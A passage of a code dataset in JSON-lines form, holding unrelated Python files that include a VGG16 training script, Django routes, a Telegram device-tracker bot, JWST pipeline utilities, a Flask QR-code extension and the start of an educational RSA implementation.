VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(Conv2D(filters=512, kernel_size=(3,3), padding=\"same\", activation=\"relu\"))\n VGG16_cnn_model.add(MaxPool2D(pool_size=(2,2),strides=(2,2)))\n \n \n model.add(Flatten())\n model.add(Dense(units=4096,activation=\"relu\"))\n model.add(Dense(units=4096,activation=\"relu\"))\n #model.add(Dense(units=2, activation=\"softmax\"))\n model.add(Dense(units=1, activation=\"softmax\"))\n \n #VGG16_cnn_model.compile(optimizer='adam',\n # loss='sparse_categorical_crossentropy',\n # metrics=['accuracy'])\n\n\n #model_summary = VGG16_cnn_model.summary()\n #print(model_summary)\n\n sgd = tf.keras.optimizers.SGD(learning_rate= i[1], momentum=0.0, nesterov=False, name='SGD')\n\n VGG16_cnn_model.compile(loss = i[0],\n optimizer = sgd,\n metrics = ['accuracy'])\n \n model_summary = VGG16_cnn_model.summary()\n print(model_summary)\n\n\n ############################################################\n # Train Model:\n ############################################################\n\n batch_size = 128\n training_size = 2148\n testing_size = 538\n epochs = 5\n\n fn_steps_per_epoch = lambda x: int(math.ceil(1. * x / batch_size))\n steps_per_epoch = fn_steps_per_epoch(training_size)\n test_steps = fn_steps_per_epoch(testing_size)\n\n # Extract dataset from folder:\n train_datagen = ImageDataGenerator(rescale = 1/255)\n test_datagen = ImageDataGenerator(rescale = 1/255)\n\n # get training images\n train_gen = train_datagen.flow_from_directory(\n r'.\\cleaned_data\\train',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # get testing images\n test_gen = test_datagen.flow_from_directory(\n r'.\\cleaned_data\\test',\n target_size = (32, 32),\n batch_size = batch_size,\n class_mode = 'binary'\n )\n\n # train model\n history = VGG16_cnn_model.fit(\n train_gen,\n steps_per_epoch = steps_per_epoch,\n epochs = epochs,\n validation_data = test_gen,\n validation_steps = test_steps\n )\n\n ############################################################\n # Export Model to working Directory:\n ############################################################\n\n model_name_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1])\n model_weights_loc = r\".\\saved_models\\VGG16_\" + str(i[0]) + str(i[1] + \"_weights\")\n\n VGG16_cnn_model.save(model_name_loc)\n VGG16_cnn_model.save_weights(model_weights_loc) \n\n","sub_path":"scripts/train_VGG16.py","file_name":"train_VGG16.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423170572","text":"# coding=utf-8\n\nimport pandas as pd\n\n\nclass MzData:\n def read(self, csv: str,\n start_symbol: str=\"s\", goal_symbol: str=\"g\", flag_symbol: str=\"f\"):\n df = pd.read_csv(csv, dtype='str', index_col='row')\n self.shape = df.shape\n\n df_fg = df == flag_symbol\n df_start = df == start_symbol\n df_goal = df == goal_symbol\n self.flags = []\n self.walls = []\n\n for row in range(-1, df.shape[0]+1):\n for col in range(-1, df.shape[1]+1):\n if 0 <= row < df.shape[0] and 0 <= col < df.shape[1]:\n pass\n else:\n self.walls.append([row, col])\n\n for row in range(df.shape[0]):\n for col in range(df.shape[1]):\n if df_fg.iat[row, col]:\n self.flags.append([row, col])\n if 
df_start.iat[row, col]:\n self.start = [row, col]\n if df_goal.iat[row, col]:\n self.goal = [row, col]","sub_path":"maze/mz_data.py","file_name":"mz_data.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"437475388","text":"from config.config import mongo\n\nclass Dampak():\n __schema = {\n \"kppn\": \"156\",\n \"level\": \"\",\n \"level_desc\": \"\",\n \"area_dampak\": {\n \"fraud\": \"\",\n \"non_fraud\": \"\"\n },\n \"reputasi\": [],\n \"sanksi\": \"\",\n \"kecelakaan\": \"\",\n \"gangguan\": \"\",\n \"kinerja\": \"\"\n }\n\n\n def find(self):\n try:\n query = mongo.db.dampak.find()\n except:\n raise Exception('db connection error')\n \n parsed_cursor = []\n\n for parsed in query:\n parsed['_id'] = str(parsed['_id'])\n parsed_cursor.append(parsed)\n\n return parsed_cursor\n\n\n def insert(self, dampak_object):\n try:\n mongo.db.dampak.insert(dampak_object)\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n\n def update(self, dampak_object):\n try:\n mongo.db.dampak.update(dampak_object['query'], dampak_object['data'])\n except:\n raise Exception('db connection error')\n \n return {\n \"status\": \"success\"\n }\n\n def delete(self, delete_criteria):\n try:\n mongo.db.dampak.delete_one(delete_criteria)\n except:\n raise Exception('db connection error')\n\n return {\n \"status\": \"success\"\n }","sub_path":"models/dampak.py","file_name":"dampak.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525502701","text":"from datetime import datetime\nfrom django.conf.urls import url\nimport django.contrib.auth.views\n\nimport app.forms\nimport app.views\nfrom django.conf.urls import include\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', app.views.home, name='home'),\n url(r'^saskaita', app.views.SaskaitaView.as_view(), name='saskaita'),\n url(r'^duomenys', app.views.DuomenysView.as_view(), name='duomenys'),\n url(r'^nurasymas', app.views.NurasymasView.as_view(), name='nurasymas'),\n url(r'^ruosiniai', app.views.RuosiniaiView.as_view(), name='ruosiniai'),\n url(r'^account', app.views.AccountView.as_view(), name='account'),\n url(r'^login/$',\n django.contrib.auth.views.login,\n {\n 'template_name': 'app/login.html',\n 'authentication_form': app.forms.BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title': 'PVM saskaitu tvarkymo sistema',\n 'year': datetime.now().year,\n }\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n url(r'^admin/', include(admin.site.urls))\n]\n","sub_path":"Python/Python_5/DjangoWebsite/DjangoWebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"98253736","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS, LightenStyle as LS\n\n#执行API调用并存储相应\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=stars'\nr = requests.get(url)\nprint(\"Status code:\", r.status_code) #状态码200表示成功\n\nresponse_dict = r.json() # 将API响应为json格式,转换为python字典\nprint(\"Total repositories: \",response_dict['total_count']) #GitHub包含py仓库总数\n\nrepo_dicts=response_dict[\"items\"] #返回的仓库字典的列表\n\nnames, plot_dicts=[],[] \nfor repo_dict in repo_dicts:\n 
names.append(repo_dict[\"name\"])\n plot_dict={\"value\":repo_dict[\"stargazers_count\"], \n \"label\":str(repo_dict[\"description\"]),\n \"xlink\":str(repo_dict[\"html_url\"])} #注意这里的str函数\n plot_dicts.append(plot_dict)\n\n#可视化\nmy_style = LS('#333366', base_style=LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15 #缩减长标签为15字符,鼠标悬停显示全称\nmy_config.show_y_guides = False #隐去水平虚线\nmy_config.width = 1000\nchart = pygal.Bar(my_config, style=my_style)\nchart.title = 'Most-Starred Python Projects on GitHub'\nchart.x_labels = names\nchart.add('', plot_dicts)\nchart.render_to_file('python_repos2.svg')","sub_path":"mycodes/chapter17/python_repos2.py","file_name":"python_repos2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"10229585","text":"import sys\nsys.stdin = open(\"4_이진힙\", \"r\")\n\ndef insert(n):\n # 일단 바로 뒤에 넣고, 최소힙이니까, 부모보다 작으면 계속 올라가야함\n G.append(nums[n])\n p = n # 내 위치를 p에 저장하고\n # 내 위치가 0보다 크면서 부모가 나보다 크면 바꿔야함\n while(p > 0 and G[p//2] > G[p]): # 만약 부모가 더 크면 => 부모와 위치 바꿔\n temp = G[p//2]\n G[p//2] = G[p]\n G[p] = temp\n p = p//2 # 그리고 이제 내위치가 부모위치, 그럼 또 그 위의 부모랑 비교해서 올라가야함\n\nT = int(input())\nfor t in range(1, T+1):\n n = int(input())\n nums = list(map(int, input().split()))\n nums.insert(0,0)\n G = [0]\n\n for i in range(1, n+1):\n # 리스트가 비어있으면 그냥 첫번째에 넣고\n if i == 1 :\n G.append(nums[i])\n # 아니면 앞의 노드들과 비교해서 넣어야함\n else: insert(i)\n\n sum1 = 0\n p = len(G)-1\n while p > 0:\n sum1 += G[p//2]\n p = p//2\n print(f\"#{t} {sum1}\")\n\n\n\n","sub_path":"day16-Tree/4_이진힙.py","file_name":"4_이진힙.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442801303","text":"import json\nfrom backends.abstract_backend import AbstractBackend\n\nFILENAME = 'links_db.json'\n\n\nclass JSONBackend(AbstractBackend):\n def __init__(self):\n super().__init__()\n self._load_data()\n\n def _load_data(self):\n try:\n with open(FILENAME) as file:\n self.storage = json.load(file)\n except FileNotFoundError:\n self.storage = {}\n\n def close(self):\n with open(FILENAME, 'w') as file:\n json.dump(self.storage, file, indent=2)\n","sub_path":"Lesson10/backends/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"162480012","text":"#!/usr/bin/env python3.7\n\"\"\"Google certified android devices tracker\"\"\"\n\nimport difflib\nimport json\nfrom datetime import date\nfrom os import rename, path, system, environ\nfrom requests import get, post\n\nGIT_OAUTH_TOKEN = environ['GIT_OAUTH_TOKEN_XFU']\nBOT_TOKEN = environ['bottoken']\nTODAY = str(date.today())\n\n\ndef fetch():\n \"\"\"\n Download latest and convert to utf-8\n \"\"\"\n url = \"http://storage.googleapis.com/play_public/supported_devices.csv\"\n response = get(url)\n data = (response.content.decode('utf-16'))\n data_list = list(data.split('\\n'))\n with open('README.md', 'w', encoding=\"utf-8\") as markdown,\\\n open('devices.json', 'w') as json_out:\n markdown.write('# Google Play Certified Android devices\\n')\n markdown.write('Last sync is {}\\n\\nhttps://support.google.com/googleplay/'\n 'answer/1727131?hl=en\\n\\n'.format(TODAY))\n markdown.write('|Retail 
Branding|Marketing Name|Device|Model|\\n')\n markdown.write('|---|---|---|---|\\n')\n devices = []\n for line in data_list[1:]:\n i = line.strip().replace(\" \", \" \").split(\",\")\n try:\n brand = i[0]\n name = i[1]\n device = i[2]\n model = i[3]\n markdown.write('|{}|{}|{}|{}|\\n'.format(brand, name, device, model))\n devices.append({'brand': brand, 'name': name, 'device': device, 'model': model})\n except IndexError:\n pass\n json.dump(devices, json_out, indent=1)\n\n\ndef diff_files():\n \"\"\"\n diff\n \"\"\"\n with open('old.md', 'r') as old, open('README.md', 'r') as new:\n diff = difflib.unified_diff(old.readlines(), new.readlines(), fromfile='old', tofile='new')\n changes = []\n for line in diff:\n if line.startswith('+'):\n changes.append(str(line))\n new = ''.join(changes[2:]).replace(\"+\", \"\")\n with open('changes', 'w') as out:\n out.write(new)\n\n\ndef post_to_tg():\n \"\"\"\n post new devices to telegram channel\n \"\"\"\n # tg\n telegram_chat = \"@CertifiedAndroidDevices\"\n with open('changes', 'r') as changes:\n for line in changes:\n info = line.split(\"|\")\n brand = info[1]\n name = info[2]\n codename = info[3]\n model = info[4]\n telegram_message = f\"New certified device added!: \\n\" \\\n f\"Brand: *{brand}*\\n\" \\\n f\"Name: *{name}*\\n\" \\\n f\"*Codename:* `{codename}`\\n\" \\\n f\"Model: *{model}*\"\n params = (\n ('chat_id', telegram_chat),\n ('text', telegram_message),\n ('parse_mode', \"Markdown\"),\n ('disable_web_page_preview', \"yes\")\n )\n telegram_url = \"https://api.telegram.org/bot\" + BOT_TOKEN + \"/sendMessage\"\n telegram_req = post(telegram_url, params=params)\n telegram_status = telegram_req.status_code\n if telegram_status == 200:\n print(\"{0}: Telegram Message sent\".format(name))\n else:\n print(\"Telegram Error\")\n\n\ndef git_commit_push():\n \"\"\"\n git add - git commit - git push\n \"\"\"\n system(\"git add README.md devices.json && git -c \\\"user.name=XiaomiFirmwareUpdater\\\" \"\n \"-c \\\"user.email=xiaomifirmwareupdater@gmail.com\\\" \"\n \"commit -m \\\"[skip ci] sync: {0}\\\" && \"\" \\\n \"\"git push -q https://{1}@github.com/androidtrackers/\"\n \"certified-android-devices.git HEAD:master\"\n .format(TODAY, GIT_OAUTH_TOKEN))\n\n\ndef main():\n \"\"\"\n certified-android-devices tracker\n \"\"\"\n if path.exists('README.md'):\n rename('README.md', 'old.md')\n fetch()\n diff_files()\n post_to_tg()\n git_commit_push()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"189601553","text":"from .base import FunctionalTest\n\nclass InspectGameTest(FunctionalTest):\n def select_message_node(self, svg_circle_element):\n svg_circle_element.find_element_by_xpath(\"..\").click()\n\n def test_inspect_game(self):\n \"\"\"Marcus looks at the results of an ongoing game.\"\"\"\n game_name = 'In Progress Game'\n self.create_game(game_name, nchains=4, depth=4)\n\n # Marcus goes to the games list and inspects the game\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He sees the nodes rendered on the svg element\n nodes = self.select_svg_nodes()\n # 1 game node, 4 chain nodes, and each chain has 1 seed and 4 children\n expected_num_nodes = 1 + 4 + (4 * 5)\n self.assertEquals(len(nodes), expected_num_nodes)\n\n def test_close_chain(self):\n \"\"\"Marcus decides to close a branch.\"\"\"\n game_name = 'Dead End Game'\n self.create_game(game_name, 
nchains=1, depth=1)\n\n self.nav_to_games_list()\n self.inspect_game(game_name)\n\n # He selects one of the child nodes.\n nodes = self.select_svg_nodes()\n expected_num_nodes = 1 + 1 + 2\n self.assertEquals(len(nodes), expected_num_nodes)\n\n message_nodes = self.select_message_nodes()\n self.assertEquals(len(message_nodes), 2)\n\n seed_message = message_nodes[0]\n self.select_message_node(seed_message)\n\n # He presses the button to edit it.\n\n # He changes the number of children to 0.\n\n # He saves his changes.\n\n # The node now shows that it is rejected, and that it is closed.\n","sub_path":"ftests/test_inspect_game.py","file_name":"test_inspect_game.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"367389777","text":"\"\"\"\nThis script tests the savings from using lru cache.\n\"\"\"\n\nimport functools\n\nclass MyVision:\n counter = 0\n\n @functools.lru_cache(maxsize=int(2**8))\n def my_dummy_calc(self, x, y, z):\n if x.x > y.x:\n return self.my_dummy_calc(y, x, z)\n self.counter+=1\n return x\n\nfrom collections import namedtuple\n\nquack = namedtuple(\"quack\", \"x y\")\n\nm = MyVision()\n\nquacks = list()\nfor i in range(8):\n for j in range(8):\n quacks.append( quack(i,j) )\n\nimport random\n\nresults = []\n\nqs = quacks[:5]\n\nwhile len(results) < 500_000:\n if random.random() < 0.9:\n q1 = random.choice(qs)\n q2 = random.choice(qs)\n q3 = random.choice(qs)\n\n else:\n q1 = random.choice(quacks)\n q2 = random.choice(quacks)\n q3 = random.choice(quacks)\n\n results.append(m.my_dummy_calc(q1,q2,q3))\n\nprint(m.counter)\n\n\n\n","sub_path":"tests/_conceptual/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"45471059","text":"# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nfrom copy import copy\nfrom importlib import import_module\nimport inspect\nimport logging\nimport os\nimport re\nimport sys\n\nfrom . 
import entry_points\n\n# Configure logging\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n# Step classes that are not user-api steps\nNON_STEPS = [\n 'EngDBLogStep',\n 'FunctionWrapper',\n 'Pipeline',\n 'Step',\n 'SystemCall',\n]\n\n\ndef resolve_step_class_alias(name):\n \"\"\"\n If the input is a recognized alias, return the\n corresponding fully-qualified class name. Otherwise\n return the input unmodified.\n\n Parameters\n ----------\n name : str\n\n Returns\n -------\n str\n \"\"\"\n for info in entry_points.get_steps():\n if info.class_alias is not None and name == info.class_alias:\n return info.class_name\n\n return name\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. 
False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n\n\ndef all_steps():\n \"\"\"List all classes subclassed from Step\n\n Returns\n -------\n steps : dict\n Key is the classname, value is the class\n \"\"\"\n from jwst.stpipe import Step\n\n jwst = import_module('jwst')\n jwst_fpath = os.path.split(jwst.__file__)[0]\n\n steps = {}\n for module in load_local_pkg(jwst_fpath):\n more_steps = {\n klass_name: klass\n for klass_name, klass in inspect.getmembers(\n module,\n lambda o: inspect.isclass(o) and issubclass(o, Step)\n )\n if klass_name not in NON_STEPS\n }\n steps.update(more_steps)\n\n return steps\n\n\ndef load_local_pkg(fpath):\n \"\"\"Generator producing all modules under fpath\n\n Parameters\n ----------\n fpath: string\n File path to the package to load.\n\n Returns\n -------\n generator\n `module` for each module found in the package.\n \"\"\"\n package_fpath, package = os.path.split(fpath)\n package_fpath_len = len(package_fpath) + 1\n sys_path = copy(sys.path)\n sys.path.insert(0, package_fpath)\n try:\n for module_fpath in folder_traverse(\n fpath, basename_regex=r'[^_].+\\.py$', path_exclude_regex='tests'\n ):\n folder_path, fname = os.path.split(module_fpath[package_fpath_len:])\n module_path = folder_path.split('/')\n module_path.append(os.path.splitext(fname)[0])\n module_path = '.'.join(module_path)\n try:\n module = import_module(module_path)\n except Exception as err:\n logger.debug(f'Cannot load module \"{module_path}\": {str(err)}')\n else:\n yield module\n except Exception as err:\n logger.debug(f'Cannot complete package loading: Exception occurred: \"{str(err)}\"')\n finally:\n sys.path = sys_path\n\n\ndef folder_traverse(folder_path, basename_regex='.+', path_exclude_regex='^$'):\n \"\"\"Generator of full file paths for all files\n in a folder.\n\n Parameters\n ----------\n folder_path: str\n The folder to traverse\n\n basename_regex: str\n Regular expression that must match\n the `basename` part of the file path.\n\n path_exclude_regex: str\n Regular expression to exclude a path.\n\n Returns\n -------\n generator\n A generator, return the next file.\n \"\"\"\n basename_regex = re.compile(basename_regex)\n path_exclude_regex = re.compile(path_exclude_regex)\n for root, dirs, files in os.walk(folder_path):\n if path_exclude_regex.search(root):\n continue\n for file in files:\n if basename_regex.match(file):\n yield os.path.join(root, file)\n","sub_path":"jwst/stpipe/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":8140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"241486437","text":"import os\nfrom sys import platform, stdout\nfrom time import sleep\n\n\n#-------------------------------------------\n# Logic Functions\nfrom getText import *\nfrom slowPrint import *\nfrom printLines import *\nfrom clearScreen import *\nfrom changeScreenSize import *\n\n\n# \"Waiting\" animation with dots. 
Allows control over the number of dots in each cycle, the amount of cycles, and the time between each dot.\ndef waitingDots(num_of_dots, num_of_loops, dot_speed, char):\n l = 0\n str = char * num_of_dots # All dots in 1 string\n while l < num_of_loops:\n for char in str: # Print each character in str with dot_speed amount of time in between\n print(char, end=\"\", flush=\"True\")\n sleep(dot_speed)\n for char in str: # Go back one space and clear it for each dot\n stdout.write(\"\\b\" * num_of_dots)\n stdout.write(\" \" * num_of_dots)\n stdout.write(\"\\b\" * num_of_dots)\n l = l + 1\n\n\n#-------------------------------------------\n# Story functions\n\nfrom story import *\n\n\n#-------------------------------------------\n# Start script\n\nchangeScreenSize(66, 38)\n\nprint(getText(\"txtimgs/tree.txt\"))\nprint(getText(\"txtimgs/helloyou.txt\"))\ninput(\"Press [ENTER] to start...\")\n\nsleep(1)\n\nchangeScreenSize(50, 4)\n\ntitle = \"Verhaal van een nieuwkomer\".center(50, \"-\")\nprint(\"\\n\"+title)\nloading = \"[»-(¯`·.·´¯)->...LOADING...<-(¯`·.·´¯)-«]\".center(50)\nslowPrint(loading, 0.01, 0.13)\nslowPrint(\"...\", 0.8, 0.8)\n\nchangeScreenSize(100, 25)\n\n\n#-------------------------------------------\n# Explanation\n\nprint('')\nprint(\"Uitleg\".center(100, \"-\"))\nsleep(0.5)\nprint('\\n\\n')\nprint('- Het spel bestaat uit stukjes verhaal (\"secties\") en vragen;'.center(100))\nsleep(1.5)\nprint('- Bij elke vraag kun je A, B en soms C antwoorden;'.center(100))\nsleep(1.5)\nprint('- De keuzes die je maakt beïnvloeden hoe het verhaal verloopt. Maak je keuzes aandachtig.'.center(100))\nsleep(2.5)\n\nx = input('\\n\\n\\n\\n\\n\\nOm het spel te starten, druk op [ENTER]. Om de credits te bekijken, typ \"credits\".\\n')\n\nclearScreen()\n\nif x.lower() == \"credits\":\n\n print('\\n')\n print('Credits'.center(100, \"-\"))\n print('\\n\\nDit keuzeverhaal spel is gemaakt door Mavis de Ridder uit klas SD1C van het Mediacollege Amsterdam, als eind-beroepsopdracht voor periode 1, jaar 1.')\n print('\\n\\nDe GitHub link voor dit project is: [https://github.com/pinkflamey/HelloYou]')\n\n input('Druk op [ENTER] om het spel te starten...')\n clearScreen()\n t1()\n \nelse:\n\n clearScreen()\n t1()","sub_path":"python/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550547647","text":"n=int(input())\r\nflag=0\r\na=[]\r\ntf=[]\r\nvalue=0\r\nfor i in range(n):\r\n a=[]\r\n fine=0\r\n months=int(input())\r\n x=input()\r\n value=x.find('0')\r\n if value>=0:\r\n x=x[value:]\r\n a=x.split(' ')\r\n fine=0\r\n for j in a:\r\n j=int(j)\r\n if j==0:\r\n fine=fine+1100\r\n elif j==1:\r\n fine=fine+100\r\n tf.append(fine)\r\nfor k in tf:\r\n print(k,end=\"\\n\")\r\n \r\n","sub_path":"chefapr1.py","file_name":"chefapr1.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330686330","text":"\"\"\"\nSupport PY3,Use BytesIO instead of StringIO\n\"\"\"\nfrom io import BytesIO\nimport base64\n\nfrom flask import render_template, Blueprint, Markup, url_for\nimport qrcode as qrc\n\ncorrection_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n}\n\n\ndef qrcode(data, version=None, error_correction='L', box_size=10, border=0, fit=True):\n # makes qr image using qrcode as qrc\n qr = 
qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n # io = StringIO()\n sio = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(sio)\n return \"data:image/png;base64,\" + base64.b64encode(sio.getvalue()).decode()\n\n\nclass QRcode(object):\n\n def __init__(self, app=None, **kwargs):\n if app:\n self.init_app(app)\n\n def init_app(self, app):\n self.register_blueprint(app)\n app.add_template_filter(qrcode)\n app.add_template_global(qrcode)\n\n def register_blueprint(self, app):\n module = Blueprint('qrcode',\n __name__,\n template_folder='templates')\n app.register_blueprint(module)\n return module\n","sub_path":"flask_qrcode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396433903","text":"# RSA implementation based on http://code.activestate.com/recipes/577737-public-key-encryption-rsa/\n\nfrom random import randrange\nfrom collections import namedtuple\nfrom math import log\nfrom base64 import b64encode, b64decode\n\nPRIME_LOWER_BOUND = 10e3\nPRIME_UPPER_BOUND = 10e6\n\nKeyPair = namedtuple(\"KeyPair\", \"public private\")\nKey = namedtuple(\"Key\", \"exp mod\")\n\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\ndef gcd(a, b):\n \"\"\"Retorna o maior divisor comum de a e b.\"\"\"\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcm(a, b):\n \"\"\"Retorna o menor múltiplo comum de a e b.\"\"\"\n return (a * b) // gcd(a, b)\n\n# https://en.wikipedia.org/wiki/Modular_expiation\ndef modular_pow(base, exp, mod):\n \"\"\"Retorna o valor de base elevado a exp no módulo mod.\"\"\"\n if mod == 1:\n return 0\n result = 1\n base = base % mod\n while exp > 0:\n if exp % 2 == 1:\n result = (result * base) % mod\n exp = exp // 2\n base = (base * base) % mod\n return result\n\n# https://en.wikipedia.org/wiki/Primality_test\ndef is_prime_naive(n):\n \"\"\"Retorna se o número n é primo. Implementação 'ingênua'.\"\"\"\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test\ndef is_prime(n, k=30):\n \"\"\"Retorna se o número n é primo. 
